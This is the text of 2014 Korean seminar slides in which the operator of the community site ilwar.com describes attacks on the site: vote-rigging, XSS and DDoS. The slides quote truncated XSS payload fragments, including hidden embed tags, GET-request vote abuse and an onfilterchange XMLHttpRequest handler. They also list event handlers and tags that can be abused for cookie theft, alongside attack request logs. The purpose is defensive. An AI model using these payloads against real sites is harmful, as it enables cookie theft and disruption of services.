0회 스쿱미디어 세미나에서 일간워스트 운영자 이준행님께서 해주신 강연자료입니다.

1. 커뮤니티
‘일간워스트’
ilwar.com
사이트
공격유입
사례
소개
!
rainygirl
2014.
5.21
D-­‐CAMP
!
rainygirl@gmail.com

2. hot.coroke.net
dot.coroke.net
battlelist.com
boooki.com
kuroro.net
ropipi.com
indistreet.com
ilwar.com

5. 5

10. 10

11. 금칙어 체크
사용자 신고접수로 보완

12. 금칙어 체크
사용자 신고접수로 보완!
+!
활동기록 추적
상호간의 평판누적
글
작성
투표
로그아웃
새로
가입
글
작성
투표
로그아웃
새로가입
글작성
로그아웃
새로가입
글작성
투표
로그아웃
새로가입
글작성…
A,B,C는
J에게
몰표중
D,E,F는
A에게
몰표중

13. 13

16. 똑같이
입력해주세요
!
518민주화운동은광주시민의숭고한희생이다

17. XSS
!
ilwar.com
공격
사례

18. 18
브라우저
오작동
유도
<img
…
height=“80000000000000000000”>

19. GET
호출
악용
<embed
src=“http://ilwar.com/free/vote/56719/d”>
<img
src=“http://ilwar.com/free/vote/56719/d”>

20. 숨은
태그로
일베찬양가
음악
몰래
틀기
<embed
src=“http://happysky.beartbrea.kr/20…”
width=0
height=0>

21. 단축URL로
우회하기
<embed
src=“http://happysky.beartbrea.kr/20…”>
!
<EmBed
src=“http://asd.so/nlb”>

22. BASE64로
XSS
공격
구현

23. 23
<div
style=“filter:glow”
onfilterchange=“var
xmlhttp=new
XMLHttpRequest()…
xmlhttp.send()”>
XSS
공격
구현

24. 24
onload
onerror
onmouseover
ontouchstart
onfilterchange
ontimeupdate
onplay
onabort
jQuery
$
XMLHttp
!
쿠키값
가로채기
사이트
오작동
유도
리다이렉션
브라우저
다운유도
XSS
에
주로
사용되는
이벤트와
기법

25. 25
<embed>
<iframe
src=””>
<iframe
srcdoc=“”>
<base>
<script>
<bgsound>
<xml>
<link>
<xmp>
<meta>
XSS
에
취약한
태그
<!-­‐-­‐
닫히지
않은
태그
!
<img>
…
…

26. 26
근본적인
해법
WhiteList
BlackList

27. 그래도
많은
사람들이
HTML과
친해졌으면…
<a
href=“”>
</a>
<b>
</b>
<del>
</del>
<img
src=“”>
<iframe
src=“”>

28. !
ilwar.com
서버/네트워크
공격
사례

29. Connected
to
ilwar.com.
Escape
character
is
'^]'.
ilwar.comilwar.comilwar.comilwar.com
ilwar.comilwar.comilwar.comilwar.com
ilwar.comilwar.comilwar.comilwar.com
ilwar.comilwar.comilwar.comilwar.com
ilwar.comilwar.comilwar.comilwar.com
ilwar.comilwar.comilwar.comilwar.com
ilwar.comilwar.comilwar.comilwar.com
!
HTTP/1.1
400
Bad
Request
29

30. 한곳의
지시로
동일패턴으로
여러
IP에서
공격
유입
Mozilla/5.0
(Macintosh;
U;
Intel
Mac
OS
X
10_6_8;
de-­‐at)
AppleWebKit/533.21.1
(KHTML,
like
Gecko)
Version/5.0.5
Safari/533.21.1

31. 31
사칭
Mozilla/5.0
(compatible;
Googlebot/2.1;

32. 125.184.225.x
119.201.54.x
61.73.193.x
123.254.173.x
210.223.144.x
118.46.132.x
175.223.36.x
123.254.173.x
210.223.144.x
61.255.249.x
118.46.132.x
121.88.141.x
61.73.193.x
219.240.199.x
61.73.193.x
118.46.132.x
115.161.113.x
......
IP차단
소용없음

33. 33
GET
/
HTTP/1.1
GET
/
HTTP/1.1
GET
/
HTTP/1.1
GET
/
HTTP/1.1
GET
/
HTTP/1.1
GET
/
HTTP/1.1
GET
/
HTTP/1.1
GET
/
HTTP/1.1
GET
/free
HTTP/1.1
GET
/free
HTTP/1.1
GET
/free
HTTP/1.1
GET
/free
HTTP/1.1
GET
/free
HTTP/1.1
GET
/free
HTTP/1.1
GET
/free
HTTP/1.1
GET
/free
HTTP/1.1
공격자는
지속적으로
취약성을
탐구

34. GET
/poli/101847
HTTP/1.1
GET
/poli/101364
HTTP/1.1
GET
/free/27485
HTTP/1.1
GET
/humor/114853
HTTP/1.1
GET
/sports/46521
HTTP/1.1
GET
/lgbt/110598
HTTP/1.1
GET
/poli/101643
HTTP/1.1
GET
/poli/101864
HTTP/1.1
GET
/free/102853
HTTP/1.1
GET
/free/98473?page=92
HTTP/1.1
GET
/free/94721?page=99913
HTTP/1.1
GET
/free/93847?page=381
HTTP/1.1
GET
/free/48143?page=4972
HTTP/1.1
GET
/humor/102843
HTTP/1.1
GET
/study/54827
HTTP/1.1
GET
/free/19845
HTTP/1.1
34
공격지
부하유발을
위한
지속적인
도전과
진화

35. 35
타
서비스
활용
DDoS
공격
시도

36. SYN
Flooding
공격으로
IDC
직접
마비시도
ilwar.com

37. 국내
여러
서비스들이
정치적
이유로
공격를
받고
있음
newstapa.com

38. 서비스
장애유발
성공여부를
확인하며
꾸준히
공격
진행

41. 즐기시던지
아니면
미리
막아
두세요

42. rainygirl.com
@rainygirl_